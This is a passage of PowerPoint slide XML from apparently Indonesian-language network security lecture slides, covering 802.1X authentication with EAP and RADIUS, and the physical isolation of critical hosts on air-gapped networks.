              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginformasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323256851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dirty="0" err="1"/>
              <a:t>Isolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fisik</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyambungkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> root di PKI. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air-gapped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dimungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air-gapped. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air-gapped </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pangkalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>militer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemerintah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fasilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air-gapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Administrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penginstalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
